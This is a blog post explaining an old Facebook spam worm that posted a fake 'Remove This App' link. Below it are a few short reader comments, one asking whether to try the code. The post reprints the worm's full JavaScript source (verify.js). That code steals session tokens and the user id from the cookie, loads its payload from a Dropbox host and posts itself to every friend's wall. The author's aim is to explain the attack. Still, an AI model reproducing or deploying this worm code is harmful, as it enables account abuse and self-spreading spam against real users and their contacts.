So I saw a post on my wall from a friend, but something just didn’t sound right. Again, it was a case of the Facebook spam that somehow tricked you into posting something you didn’t want to post to all of your friends. And many people made the mistake, and it spread fast.
Mainly, it is impressive that these Facebook hackers were able to come up with this. It shows you how difficult of a problem security is for a big company like Facebook.
The hack was that they made a link which appeared to be from Facebook say “Remove this App” right next to common actions like “Like” or “Comment.” But this link was a link to a malicious piece of javascript which got a file from Dropbox and copied this post onto the walls of your friends.
I went to look at the file… which was here, http://dl.dropbox.com/u/10505629/verify.js. But then I went back and Dropbox had apparently taken it down about two minutes later. A fast response–but this message had probably already been replicated, idk, a hundred thousand times?
It seems to have been low damage, but it raises interesting security questions when people believe so readily the information that comes from their friends’ Facebook accounts. I just heard yesterday a case where a friend’s mom’s account had sent out a message about needing help and wiring money–and people fell for it.
I’m posting the js code below, since it is now not accessible — but with the swearing removed.
==== verify.js ======
var message = "-------------------- I hate you and the only way to remove all these posts is by disabling this below.";
var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://dl.dropbox.com/u/10505629/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";
var myText = "Remove This App";
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);
var friends = new Array();
gf = new XMLHttpRequest();
gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
gf.send();
if(gf.readyState!=4){ }else{
data = eval('(' + gf.responseText.substr(9) + ')');
if(data.error){ }else{
friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
}
}
for(var i=0 ; i < friends.length ; i++) {
var httpwp = new XMLHttpRequest();
var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1";
var paramswp = "&__d=1&app_id=6628568379&extern=0&" +
"&post_form_id=" + post_form_id +
"&fb_dtsg=" + fb_dtsg +
"&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) +
"&feed_info[action_links][0][text]=" + encodeURIComponent(myText) +
"&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +
"&user_message=" + message;
httpwp.open("POST", urlwp, true);
httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
httpwp.setRequestHeader("Content-length", paramswp.length);
httpwp.setRequestHeader("Connection", "keep-alive");
httpwp.onreadystatechange = function(){
if (httpwp.readyState == 4 && httpwp.status == 200){
}
}
httpwp.send(paramswp);
}
alert("Failed to remove. ----------");
document.location = "";
Haha we were talking about this the other day–I’m glad you figured out how it worked!
please explain whet the 2 blocks of code are for i see the first is verify.js whast the second and should i attempt to use it lol
is good, is i perfect ok
i love page